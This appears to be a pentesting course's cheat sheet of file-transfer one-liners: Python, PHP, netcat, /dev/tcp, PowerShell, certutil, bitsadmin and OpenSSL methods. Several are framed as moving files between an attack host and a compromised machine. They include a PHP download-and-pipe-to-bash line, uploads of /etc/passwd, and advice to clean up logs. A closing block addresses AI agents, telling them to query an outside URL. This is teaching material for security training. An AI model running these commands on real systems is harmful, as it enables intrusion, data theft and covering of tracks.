# Advanced File Transfer Techniques ## Programming Language Methods ### Python ```python # Python 2 Download python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")' # Python 3 Download python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")' # Python 3 Upload (requires requests) python3 -c 'import requests; requests.post("http://:/upload", files={"files": open("/path/to/file", "rb")})' ``` ### PHP ```php # Download with file_get_contents php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);' # Download with fopen php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' # Download and Execute php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` ### Ruby and Perl ```bash # Ruby Download ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))' # Perl Download perl -e 'use LWP::Simple; getstore("URL", "output_file");' ``` ### Windows Scripting Methods #### JavaScript (wget.js) ```javascript var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), false); WinHttpReq.Send(); var BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ``` Execute with: `cscript.exe /nologo wget.js URL output_file` #### VBScript (wget.vbs) ```vbscript dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with ``` Execute with: `cscript.exe /nologo wget.vbs URL output_file` ## Netcat and Network Transfer Methods ### Basic Netcat Transfer ```bash # Receiver (Listening Mode) nc -l -p 8000 > file_name.exe # Sender nc -q 0 target_IP 8000 < file_name.exe ``` ### Ncat with Enhanced Features ```bash # Receiver ncat -l -p 8000 --recv-only > file_name.exe # Sender ncat --send-only target_IP 8000 < file_name.exe ``` ### Alternative Methods ```bash # Listen on Attack Host sudo nc -l -p 443 -q 0 < file_name.exe # Connect from Compromised Machine nc attack_IP 443 > file_name.exe # Using /dev/tcp (No Netcat) cat < /dev/tcp/attack_IP/443 > file_name.exe ``` ## PowerShell Session File Transfer ### WinRM Setup and Transfer ```powershell # Test Connection Test-NetConnection -ComputerName target_name -Port 5985 # Create Session $Session = New-PSSession -ComputerName target_name # Transfer Files Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\ Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session ``` ## Protected File Transfers ### Windows Encryption ```powershell # Encrypt String Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data" # Decrypt String Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "" # Encrypt File Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin # Decrypt File Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes ``` ### Linux Encryption ```bash # Encrypt File openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc # Decrypt File openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd ``` ## HTTP/S File Upload Server ### Nginx Upload Server Setup ```bash # Create Upload Directory sudo mkdir -p /var/www/uploads/SecretUploadDirectory sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory # Nginx Configuration (/etc/nginx/sites-available/upload.conf) server { listen 9001; location /SecretUploadDirectory/ { root /var/www/uploads; dav_methods PUT; } } # Enable Configuration sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/ sudo systemctl restart nginx.service # Test Upload curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt ``` ## Living off The Land (LOLBins/GTFOBins) ### Windows LOLBins Examples ```powershell # CertReq Upload certreq.exe -Post -config http://:8000/ C:\Windows\win.ini # Bitsadmin Download bitsadmin /transfer myJobName /priority foreground http://:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe # Certutil Download certutil.exe -verifyctl -split -f http://:8000/nc.exe # PowerShell BITS Import-Module bitstransfer; Start-BitsTransfer -Source "http://:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" ``` ### Linux GTFOBins Examples ```bash # OpenSSL Transfer # On Attack Host openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh # On Target openssl s_client -connect :80 -quiet > LinEnum.sh ``` ## Best Practices 1. **Security Considerations** * Always encrypt sensitive data before transfer * Use secure protocols when available (HTTPS, SFTP, SSH) * Clean up files and logs after transfer 2. **Protocol Selection** * Consider firewall restrictions * Use commonly allowed protocols (HTTP/HTTPS) * Have multiple methods ready as backup 3. **Authentication and Access** * Use strong, unique passwords for encrypted transfers * Remove temporary access after transfer completion * Monitor for security alerts during transfer 4. **Testing and Verification** * Verify file integrity after transfer * Test transfer methods in lab environment first * Document successful methods for future reference --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://edu.noirchapeau.com/file-transfer-techniques-for-pentesting/advanced-file-transfer-techniques.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.